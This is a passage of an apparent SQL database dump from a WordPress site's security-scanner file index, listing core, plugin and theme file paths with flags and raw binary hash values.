!_���>�kwd�X��p���_','',0,'?'),('3��JΑTg�0��\'e','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`4���uB\nE�#@��W',')r�xUYJ�;hpjH{\\����1\'#�� s�','',0,'?'),('3���\'���RK�Bf�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QO1�/<�>%\"�X��','�6�r�*�IY\0�C�9<��Jږ J*�xD','',0,'?'),('3��fQ3�h�5[��W�<','wp-includes/Text/Diff/Renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �C0�Y7O�@�GS','EWj�+��\\��=����}.��1\r��|','',0,'?'),('3��ng\0��\\\0	�W','wp-includes/IXR/class-IXR-value.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�>�5l�j\0f�','�?h����͇ X��UP�O|H$�1���','',0,'?'),('4\09B��}W^�D#NM�','wp-content/themes/shootingstar/template-landing-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*ˉ^v_M3�+=@','����\'�)������\"���~�yJ���R','',0,'?'),('4\n��	m�]Ŀ�Њ��','wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�+e��[e�ϙ�fW�','QA��u&�{Ai��XP�K�[�{0�Q�k��','',0,'?'),('4�31@�*r�����8','wp-includes/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ś�L�\\�Pڜ�U','c>�5�o�������𽃐�_�T9�L~;�e7�','',0,'?'),('48�Vt���+^X�','wp-includes/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!	/�\"۵�$=�iU�','\rh�s�c��6Z$���P͡�\r!W%vD�~��j�','',0,'?'),('4;`߯z�?	�{Ǟ@','wp-content/plugins/wordfence/images/2fa-whole.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h»����$\ZPfX�','�ƪɝ����U[Z~��^�d�\'�X�ٮ���','',0,'?'),('4;��2������@y','wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js',0,'cdxo&l�g�8�3��','cdxo&l�g�8�3��','�h_�8��r0�y-��\nϥ��KL-� {','',0,'?'),('4AI�n09��7c`','wp-includes/js/tinymce/utils/validate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CL�1?o+;���{Y�','k�H��;�\0�kC�s�	\'K�#45+eE|���0','',0,'?'),('4To���iE��t�','wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�I�SD���D\Z.{','o�N�Wl����y�����]�����\'�����','',0,'?'),('4a�[I�}���H�m)','wp-admin/css/deprecated-media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M>��_�^�����9F','.��*�AU�u0�	\'�Q�2˻�=�x4w��g�','',0,'?'),('4������Kv 	V�','wp-includes/wp-includes/js/crop/cropper.js',0,'����H.s�o����','����H.s�o����','�py����,B�����G��-�t�����=�s','',0,'?'),('4���=�T�n}�&��','wp-includes/wp-includes/css/jquery-ui-dialog.min.css',0,'��S`���7у�-�','��S`���7у�-�','j�&�Ұ�M������u�@��6L}�5����{','',0,'?'),('4ڂ��L$�,K[�u��','xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�8\nP*�a|/ٳK','XdB�c\0���2��Ý��c���g�������','',0,'?'),('5�?��y��<�2�','wp-admin/css/dashboard-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o0�Dk�ģ\'-5�S�','����r�?�\0��1�}2�IDse�K���W�k�','',0,'?'),('5.=���d)<p�eu�s^','wp-includes/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}��][W�)�B��y�','e3\nx��&\\āk���٦�|���V��s��','',0,'?'),('58�d�`S61K>ۮ�v','wp-admin/css/colors/blue/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cg�ͤa�p�:^���','׵Z���#��#�z�2�$R�6C����1���','',0,'?'),('5C�)\nWu�꽝/F�cK','wp-includes/js/plupload/wp-plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K%A�};܃q:{��','+8k�����/S*15xB�L6R�P���4�5�','',0,'?'),('5S{�TƁ���e�/�','wp-includes/class-walker-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;C\r��7�l����','q	��MQ�Anq2Y|��]�d�]����R!(�','',0,'?'),('5Xܨ�*���{L0%�','wp-content/plugins/wordfence/modules/login-security/js/admin.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Q5�\Z��*y�y!�s','��J���\"qUK�a��\'1�_N�XG�`揧W>','',0,'?'),('5Z����Sμ�v�`6�9','wp-includes/version.php',0,'<c!�zLz~Љ���','<c!�zLz~Љ���','��:J��	����\r����n��p{97�nS�c�','',0,'?'),('5\\h>��w	���N�','wp-includes/registration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���S��D��31�','ՙ���vF��٫���P��B8.�����8�','',0,'?'),('5`�]\\ͭi\0���\ZJ�T','wp-includes/class-wp-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�����\\�OR���Z','�`7t/���}�z����f!��l=�,�8tS0F�]','',0,'?'),('5��92���^�%<��','wp-admin/edit-form-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�4\0��bo���K3{�','����?��bG�,��*>LPmy�������)�Q','',0,'?'),('5�7�N	C=��-��c�','wp-content/plugins/wordfence/images/sort_asc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�D�K���zS§0','N�Q�*��TZ%P��%���jܑtZn/�','',0,'?'),('5�#t�5R�шK����','wp-content/wflogs/config-livewaf.php',0,'C�l���$�t��\'m�','C�l���$�t��\'m�','?�a�@�J{�5)<���W���&��#	��?��','',0,'?'),('5�H# ��t��-A�R','wp-includes/wp-includes/class-wp-image-editor.php',0,'(\r��^��k���+)','(\r��^��k���+)','�GY��<\Z�����\"B��v�Ԅ��2K9i��bQ','',0,'?'),('5�;fm���D7JE�','wp-includes/wp-includes/sodium_compat/src/Core/Base64/Common.php',0,'P��ef���i�\'�jW','P��ef���i�\'�jW','6���UmЖ�%��?�M�S�A^=�X��|U��','',0,'?'),('5�r��Yķ��\"���Q','wp-includes/wp-includes/js/wp-emoji-release.min.js',0,'�d͢7@$��g�;','�d͢7@$��g�;','F\r�R7��s\"YX^�ȹ�$�y�ss[','',0,'?'),('6����X/��HL','wp-includes/js/mediaelement/wp-playlist.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����X�l\"�o�','�/=àBAo&���I�1��]k~�N���','',0,'?'),('6c�k���6_sx$�>\"','wp-content/plugins/wp-cerber/assets/flags/et.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8������ZltS���\"','c��/s]\Z�`R��ꩧ`���֌�E�����P�','',0,'?'),('6;I(�H�m�%��f�','wp-admin/css/farbtastic-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7\n���)�{��','T�=�Y#��[���vr�H�ia��R���','',0,'?'),('6W(\'�����P�4�','wp-content/plugins/wp-cerber/assets/flags/gn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������M�MH����,','����nr���A�[/�Á����*f|DeTJC�J','',0,'?'),('6[f�9�?�� _�','wp-content/plugins/wordfence/images/icons/bullet_yellow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J&���Ɍ����ԔQ<','1���Nߗ����׍?*�i�í!F�Mp�9^.','',0,'?'),('6c�b��kk��i3�@�H','wp-content/plugins/wordfence/lib/menu_firewall_waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)VUL��C_�V8�','����EL\r�\";�m[�+G��G��k4+)','',0,'?'),('6�]j�v�W�k\r3-�','wp-admin/load-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ft_ov�в���','f�k�!RG4�;��jhnut֭���ʭd\ZW�n','',0,'?'),('6��ƌ���C���+','wp-includes/sitemaps/providers/class-wp-sitemaps-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܇��X%�EWy�m\'��','�|�\rL�ʜэ�|�Ry��6S^�\\��','',0,'?'),('6̠,��_���q��u�','wp-admin/includes/class-wp-filesystem-ftpext.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0F������\"��e�	','<̌��ܹW��p�LB o�;$2�ȴ��/%g','',0,'?'),('6٨	�:{�^D�','wp-includes/js/jquery/ui/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e�o-�����q','���l�:�ͦ]�n���9cF����?�c','',0,'?'),('6�t\'�\\�	y18@Q\rt','wp-includes/wp-includes/deprecated.php',0,'���X�;|N.��S_d�?','���X�;|N.��S_d�?','S5�g���*����r����x�{��&','',0,'?'),('7\"��妿W�\r��ѽ�','wp-content/plugins/wordfence/lib/menu_wordfence_central.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ad��_7����$a','�.��ޖ6��I$��LdW�|�]�E�y\"��','',0,'?'),('76�6? X,��-�6�)�','wp-content/plugins/wp-cerber/assets/flags/eu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t;�zC�oػ�@���','��m��2����A�,��%(�#��%c)�+�w','',0,'?'),('7@��&HV��k���:��','wp-includes/wp-includes/sitemaps.php',0,'gG�xN�)�/���*','gG�xN�)�/���*','�%��S�i����x3�k���O��nz]���','',0,'?'),('7R!��E�������','wp-includes/wp-includes/theme-compat/sidebar.php',0,'(�S��;��I��(','(�S��;��I��(','���U�kx�r��Lb�\"��JAF�(u;	\0�&','',0,'?'),('7]\n��ry�$�+��j','wp-content/themes/shootingstar/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�	X2Ar/�S��','3��B��x�:�S�rHieT���z>�����(','',0,'?'),('7cqT�$=�Z�吽�V','wp-includes/wp-includes/css/customize-preview-rtl.css',0,'��މ����ګd��3','��މ����ګd��3','~�\'��[z�{��:����LĀN7A��	','',0,'?'),('7r��uF��@J,','wp-content/plugins/wordfence/lib/wfDateLocalization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�K_J�2Cmcͭ�t�','D��jy��,�Lw�a� <U��� ����S','',0,'?'),('7|oOU���z\0Ef���','wp-admin/network/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L�;G_bu\'\\','�v,I/L^���ww\ZX1�2�y�T�ɣI��~','',0,'?'),('7�P�Y����i���ߝ','wp-includes/wp-includes/js/shortcode.js',0,'@�������P}�SΊ','@�������P}�SΊ','yae�aK��R�\0%��xy��u�y�↢','',0,'?'),('7�%Wy~׹P?�x��','wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lzV6`wmZBs���','\r �8�&�J�34�б��ǽ�����','',0,'?'),('7����3KNk�&���','wp-includes/wp-includes/images/media/audio.png',0,'�taCA���.��Z�','�taCA���.��Z�','�L�>��$��\n�oixoj-\nL�����]G;q','',0,'?'),('7���o^l�:���B','wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	��I�ݶ�3��S','!MڒޫDw����we(�!��=��ިd��,GW','',0,'?'),('7�c�¢)��S�eb�','wp-includes/js/jquery/ui/menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��\"f_�2�eg�','�{�B��x��\r;f	�2��4�/����4E�','',0,'?'),('7�c�.$P!�\"�򹚆','wp-content/plugins/wordfence/images/sort_desc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<���j��_�ˊR�2','*��-�9�.���HGO6/�L�):�C�d�z�','',0,'?'),('7���k�X�f�Xm�S�','wp-includes/js/dist/vendor/wp-polyfill-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','El�*Ie��NZ�aK��','�K�+|���̫M5J�����y�0�It�lol','',0,'?'),('7�2��_R�D��;n�','wp-includes/blocks/block/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�,:�&\0�:�(�	','1�Cf����>�-K�J\"��1�%�I���P3�Z�','',0,'?'),('8�x>Ș����pԠ�','wp-includes/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',0,'�h���g`ɸ:ڕ^','�h���g`ɸ:ڕ^','���F/Q�H\0���^l 0�BΓի6S@Ph�','',0,'?'),('8��\"m9�!8���#?','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',0,'[M/*��E�<s�W�RG','[M/*��E�<s�W�RG','\n�\\��Xΰ֨P��A�—\nXj�\'�;q�{��a�','',0,'?'),('8%دTP�Υ��Ա','wp-includes/wp-includes/js/dist/annotations.min.js',0,'�%e���F�\"�8�]','�%e���F�\"�8�]','�U��8�E�]�\0{\"�2��Eh��$���*�\'�H','',0,'?'),('8=�I��a�%��k�~�','wp-admin/js/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ο��1S���&�5�F','�),_Ե�DWڪt�q��j\'Oy����>A\\�','',0,'?'),('8?6B�\r��pl2�R�x','wp-content/wflogs/config-synced.php',0,'�T��q�G�f�05�B','�T��q�G�f�05�B','A\0���>h\\��WQl����$�I�+k�L|J>','',0,'?'),('8P֧�\Z�HGE}8�','wp-includes/Requests/Exception/HTTP/306.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wsz�uNP�j���Xu','4�U���Q\r1#_f������H���*I�dl��','',0,'?'),('8Y���v���C�[,��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:\0��>������}LQ\0','���_U\0]q=Չ��f�\\�/�	@d��\r�+v�*(','',0,'?'),('8�R6�DH��q�-{�:`','wp-admin/includes/translation-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!>D�glM�<�mg�','\r�[��8*�5n݊��Pc���^8d%?f','',0,'?'),('8�@)��6yg[y�sQR','wp-admin/css/deprecated-media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h��\"z���Pgw','���I�\'�Hk���,���1��5!u�.���2','',0,'?'),('8�1��q2Y�O���%�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',0,'��#����� v��d','��#����� v��d','W�Y�0����2w��	5�O���zm� ���^','',0,'?'),('8ÛZE�Q$}UP�T��','wp-content/plugins/wordfence/lib/wfCrawl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�铇�ܙ~�\r�m','%&��9�	/D�XG�؞�߇��U�����4','',0,'?'),('8ܞt��\Zw�Nxa��','wp-includes/class-wp-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZM�ٟ�:�l\"pdΛ�','�%q2���Ӑ�F���JȑR~҃i���`;�>�','',0,'?'),('8�1rpz뽐�N?��','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png',0,'U,�:)��؋\"�QqY','U,�:)��؋\"�QqY','\"�Oo�ۈ���<��oES-MO÷�YN�!��','',0,'?'),('8�|Q��f��~֭�\0� ','wp-includes/wp-includes/js/mediaelement/mediaelement.js',0,'��a\0����\Z^2�-!]','��a\0����\Z^2�-!]',' �+	M*a)N#kq�Dm]��{�=_b�?','',0,'?'),('8�kA+�_����Ln�B','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png',0,'{�6�#UQ:��|>#��','{�6�#UQ:��|>#��','�(��[\n�̻�o�RAo�3��^����','',0,'?'),('9�/��f��v�,P�T','wp-content/themes/sg-window/img/icons/youtube.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��T���b#�','�ޡ���\"���ٛ��8b]�4j~\'mAz�','',0,'?'),('9�\r5\'X���>?�','wp-includes/js/customize-preview-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�}�����x��c�&�','������(]P���UP\'L��2��n�\Z�\n���','',0,'?'),('9ψ[�1d{���@','wp-includes/class.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U���vz��4�<q\Z�','���/U��V�tD��b}��F�9S��z���','',0,'?'),('9:��d�o\n��p`Ry��','wp-includes/js/tinymce/langs/wp-langs-en.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���s�/�q��','����T����s���%���S�Z������','',0,'?'),('9QKW?����,�','wp-includes/wp-includes/blocks/column/block.json',0,'b\'��������E�4�','b\'��������E�4�','z�,�g3�l[�9�v[�=\rW�\'3e�c�INڷ�','',0,'?'),('9k�sB��=}��TŃc7','wp-includes/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V���zȒ��`(�lE�','������⯠盍������ԵJ�\\�_�z[','',0,'?'),('9v@�o�nr�����*','wp-content/plugins/wp-cerber/assets/flags/am.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�(v���ߩM�$Cݣn','�c4�n�6W����V�^�:�s��ݺ#����','',0,'?'),('9�#\'�\nX�����]ʨ','wp-includes/wp-includes/js/jquery/ui/effect-blind.js',0,'����{5���%�ko','����{5���%�ko','��0ʟ\0`rz){쥵3�[��[q[��ٵ','',0,'?'),('9�N�����D�	a','wp-includes/wp-includes/js/crop/marqueeVert.gif',0,'����\0���9��R���','����\0���9��R���','K�cg$�e���2\\p�$�1z�����`CkJ�','',0,'?'),('9�} B^��?	�\"�','wp-includes/script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dyx-��ғɰnO','�K$����9\"�x$��]0�JL$�h��n���','',0,'?'),('9��)�&��{Sd�G','wp-content/plugins/wp-cerber/assets/wp-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\0i�L�1���_��','��{Ո��R3i²�V���J}��0Ʀ�e\'\n	�','',0,'?'),('9����	��ӗ�5�\Z','wp-includes/wp-includes/class-wp-site.php',0,'��eo��C�I�7#�\n��','��eo��C�I�7#�\n��','-�h���ʠ^�F�0?�0\n�%s�ibV\\�X�','',0,'?'),('9ՍҢ��9��d\r�Y','wp-includes/ID3/license.commercial.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n;g��J�g����xA�','�t_2�x�<��-���˜wq�I�g���','',0,'?'),('9��s�3�SZ,p�8g','wp-includes/images/media/text.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z��s��0�ȝ�Q�K','�g��?[��D*�p�8�q���Vѓ�>��N','',0,'?'),(':{���{7�9����','wp-admin/link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�gg��&ёb�� ��','(C<M�d*2Ƚ��*�N�t�n����T~��\ZW','',0,'?'),(':�|L�H6(��c�g��','wp-includes/ID3/module.audio.ogg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_2��\n$9��`m85','�6%u?E�M��l�Ȑ�@5vr�[�j\'t�H��f','',0,'?'),(':1�(�)p]V1�-ȩ�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qDL���a�[	?�$','G�s\0��\r�/1�v=������pS-�yE.��U','',0,'?'),(':7W�{hX��`-��d','wp-includes/wp-includes/js/imgareaselect/border-anim-v.gif',0,' �z!�<�7�����*�',' �z!�<�7�����*�','��>���d�:���j1�<�!4�6�g��','',0,'?'),(':<�$��0,w\"&e({','wp-includes/class-feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�y�ܫ��]��T','�8��j2�y�N!qʩp�����t\0A��2\\Y','',0,'?'),(':D�J�$�h��Dž\r�','wp-admin/js/customize-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{9�:=��q��aT��','Fb�EE��sn��>����+�o�F�<Zn�','',0,'?'),(':H6Jf�XGs���@�','wp-includes/wp-includes/js/media-audiovideo.js',0,'�ж���t\Z�����','�ж���t\Z�����','s<~d;lL�n�_u+1��jDO����\\�\0��','',0,'?'),(':���%H`!���\r�Z','wp-admin/js/media-gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K;p�O�?F`h�w','�[��7�2��s���d`��������Mo','',0,'?'),(':�x��3�L&�3ſhD','wp-content/plugins/wp-cerber/assets/flags/mz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K����v�)�Q�H�vz','�A�q#7����F�tˎ��Y�\\�j�ň�V:ܯ','',0,'?'),(':�˺�+���u��','wp-content/plugins/wordfence/js/Chart.bundle.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5]��d��d�f�','��>��`������NN�`�N\"K�Ӟc�kG<;','',0,'?'),(':۪�y�_;��h��\rB','wp-includes/wp-includes/sodium_compat/src/Core32/Util.php',0,'��1�`���0�����','��1�`���0�����','�qƖ����%/�y�g�rwÛ�\r�LR>=Y','',0,'?'),(':�ԇB���R>m�','wp-includes/wp-includes/images/wpicons.png',0,'dS��uq��V_���a�','dS��uq��V_���a�','���cZ_��?n�_��K��6��1�\\}r','',0,'?'),(':�Xqݝ�J\\�5P�4','wp-includes/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),(':�ṇRM�ti#��=','wp-includes/images/media/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�taCA���.��Z�','�L�>��$��\n�oixoj-\nL�����]G;q','',0,'?'),(';#�	n����%\"���','wp-includes/Requests/Exception/HTTP/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��c�Y\0�ys��<M','��-!V��>d�*jP�F�	�;QƵ��N1aG�(','',0,'?'),(';�ԧ�$=&a���V�','wp-includes/wp-includes/js/zxcvbn-async.min.js',0,'��E��\nO\\��Y�b','��E��\nO\\��Y�b','��\'FP�\Z�/G\n��J����\\B��\Z��IT�','',0,'?'),(';�b�fȖ0����x','wp-admin/css/colors/midnight/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';C_�\n����c�K�','}y�Լ�A�lKnIJH�z&NVc���:[3�@n','',0,'?'),(';ܒscF��!����','wp-includes/css/dist/components/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��y�T�����&]H|�','RU\Z����[�^͝�/��a��/�9�\0�x��','',0,'?'),(';1ы#�Y_N��t�','wp-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1���J��ѡ��πi','���8C���P����/��g�e�TCW_��','',0,'?'),(';R�yh���RxK�\r','wp-admin/js/farbtastic.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�T�2Aq]����4�','�bt�G�p�\0BM0z�XJv�Z�HAt�M�%','',0,'?'),(';^�e��R��$�	���','wp-includes/wp-includes/blocks/social-links/block.json',0,'��<{�Vg3B+z�B��','��<{�Vg3B+z�B��','�I�W�}��Ogzˀ	��h��-��wl','',0,'?'),(';���F�����&���','wp-includes/wp-includes/images/crystal/interactive.png',0,'�R�m`��`�9��','�R�m`��`�9��','$����멘<x1��Փ��IR�V-VZ\\jg.���','',0,'?'),(';��,�<��yb��2','wp-includes/wp-includes/images/admin-bar-sprite-2x.png',0,'�Q����8��o��','�Q����8��o��','*E��Ts���al�^�p��X���Z\0��','',0,'?'),(';���4�[���`�̃','wp-content/plugins/wp-cerber/cerber-lab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ߣ0�SÂ���7~�:A','�ʼnO��V���%Y��UR�L��Tyh1\Z��G7','',0,'?'),(';�Q�ۤ��\"PH#@�wc','wp-content/themes/shootingstar/css/elegantfont.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�:��=��y����','3v�a��ұ��rr�on��BRǁ����','',0,'?'),(';���=�Ȑ2�GG�','wp-content/themes/sg-window/sidebar-before-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t���X��^�{`','*�f�G \ZU��ܑq�e��A��ʩ�����8','',0,'?'),(';�v�0BK����1д','wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+o~��X��ݓ\0�','xX��ѹ�$6�UdZ$����x�����&3�','',0,'?'),(';�1e�ˍ���0��X\0','wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',0,'����R�<�nI�<','����R�<�nI�<','�e}]T��Y(�u&\r��90+��a�DϮ�#��','',0,'?'),(';�Wct���*+��Br�','wp-includes/images/smilies/icon_surprised.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��-��#+����0�?','��cuy�X�ؓ�A��d�5[=w>�*S�pwe�._','',0,'?'),(';����*1\Zn��4�','wp-includes/js/wp-emoji-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' #j��2��\'5�!�gM','����϶.�X���po�I3���fY��cMʲ','',0,'?'),('<������un�ɗ','wp-includes/wp-includes/SimplePie/Core.php',0,'ز3aݩ�0)��_�S','ز3aݩ�0)��_�S','���760�w8��([���o�W��K��4d���','',0,'?'),('<\Z\r�\Z!�����K`i','wp-content/plugins/wp-cerber/cerber-common.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���y�˖@%��','h66��b�����hS��=��J$���','',0,'?'),('<F���Pz�22��~','wp-includes/js/imgareaselect/imgareaselect.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}(��()��3���󵕯','�q�!ݿJӇ��i\n�E�5s�!�\r���%��','',0,'?'),('<Y��O�\0t��ߗ5�','wp-content/themes/shootingstar/functions/about/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��mL;�,�@��(��','�QP���8T��;��!�b0�G�p����\nW�','',0,'?'),('<o���]���)�	ܡ��','wp-includes/wp-includes/js/wp-util.js',0,'M�J���2$J��+���','M�J���2$J��+���','�u������g⽶����`߆�]�SR,�а�','',0,'?'),('<y\"v�0p��+\'���','wp-content/plugins/wp-cerber/assets/flags/pw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T���k�	���e�','.�ڜ/��V���eR����x���P�i��_','',0,'?'),('<��9�u�j����!�$','wp-admin/css/install.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E.�)��\\�s	��\'','�G4:hu�\'�QN�=;F	״�EQ44��j','',0,'?'),('<����u������}��b','wp-includes/wp-includes/class-wp-block-list.php',0,'�.�״�8��9��','�.�״�8��9��','�$-���R̒�~�����N�j��]?=��&','',0,'?'),('<��$�C�DO��#��','wp-content/plugins/wp-cerber/assets/flags/fj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':���yZd=�\\l���r','C�����ȶ�]�*�s������l湘Jڀ�<e','',0,'?'),('<�hj�	�4���4a�2�','wp-includes/js/utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2���![pNI�5','iII4�*��{FZan�Ǡ�)J,T�&�g��','',0,'?'),('<��u꿖\Zܜ��Y�^','wp-includes/js/tinymce/plugins/wpeditimage/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�<�]�@����	4�','\r]\"��!�\'sg=�����zķQ��2�NK�','',0,'?'),('=J��ǰja�}LI�Z','wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pF��t1�+���','�;�}��\0[���\'\rq�����ĥd�;#�.','',0,'?'),('=���f;V�dl\"��','wp-admin/css/code-editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���.��y��^J�i�*','{� ������I��^�`��\0�����<<','',0,'?'),('=	]��}��*<.','wp-content/plugins/wordfence/views/waf/waf-install-manual.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=\'mP��x5KbY.�','i�M�Q�����W\r���d�ɸ���','',0,'?'),('=H9�Z��\Z�Z��J','wp-includes/wp-includes/js/wp-backbone.js',0,'��J��T	��l�Q��1','��J��T	